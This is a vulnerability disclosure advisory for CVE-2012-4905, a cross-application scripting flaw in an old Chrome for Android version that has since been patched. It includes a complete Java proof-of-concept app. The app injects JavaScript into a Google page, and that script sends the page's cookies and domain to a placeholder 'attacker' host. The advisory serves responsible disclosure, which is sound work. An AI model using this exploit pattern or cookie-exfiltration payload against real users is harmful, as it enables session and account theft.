Chrome For Android Universal Cross Site Scripting

`CVE Number: CVE-2012-4905  
Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra  
Affected Software: Confirmed on Chrome for Android v18.0.1025123  
Credit: Takeshi Terada  
Issue Status: v18.0.1025308 was released which fixes this vulnerability  
  
Overview:  
By sending a crafted Intent to Chrome for Android, malicious Android apps can  
inject javascript into arbitrary Web pages rendered in Chrome. Such kind of  
UXSS-like vulnerabilities is often called Cross-Application Scripting.  
  
Details:  
When other Android apps send an Intent with javascript: URI to Chrome for  
Android (v18.0.1025123), Chrome opens a new tab and execute the JavaScript  
code in the context of the blank domain. Probably this is a countermeasure  
against UXSS attacks.  
  
However, this can be bypassed by an Intent with Extra data as below:  
  
intent.putExtra("com.android.browser.application_id", "com.android.chrome");  
  
With an Intent that contains such Extra data, Chrome loads javascript: URI  
(written in the Intent) in the current foreground tab, not in a blank tab.  
  
This enables malicious Android apps to execute arbitrary JavaScript code in  
arbitrary domains on Chrome. As a result, other apps are able to steal Cookies  
and so on.  
  
Proof of Concept:  
package jp.mbsd.terada.attackchrome1;  
  
import android.app.Activity;  
import android.os.Bundle;  
import android.content.Intent;  
import android.net.Uri;  
  
public class Main extends Activity {  
@Override  
public void onCreate(Bundle savedInstanceState) {  
super.onCreate(savedInstanceState);  
setContentView(R.layout.main);  
doit();  
}  
  
// get intent to invoke the chrome app  
public Intent getIntentForChrome(String url) {  
Intent intent = new Intent("android.intent.action.VIEW");  
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");  
intent.setData(Uri.parse(url));  
return intent;  
}  
  
public void doit() {  
try {  
// At first, force the chrome app to open a target Web page  
Intent intent1 = getIntentForChrome("http://www.google.com/1");  
startActivity(intent1);  
  
// wait a few seconds  
Thread.sleep(3000);  
  
// JS code to inject into the target (www.google.com)  
String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"  
+ "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"  
+ "document.body.appendChild(img);";  
  
Intent intent2 = getIntentForChrome(jsURL);  
  
// Trick to prevent Chrome from opening the JS URL in a different tab  
intent2.putExtra("com.android.browser.application_id", "com.android.chrome");  
intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);  
  
// Inject JS into the target Web page  
startActivity(intent2);  
}  
catch (Exception e) {}  
}  
}  
  
Timeline:  
2012/07/07 Reported to Google security team.  
2012/09/12 Vender announced v18.0.1025308  
2013/01/07 Disclosure of this advisory  
  
Recommendation:  
Upgrade to the latest version.  
  
Reference:  
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html  
https://code.google.com/p/chromium/issues/detail?id=144813  
`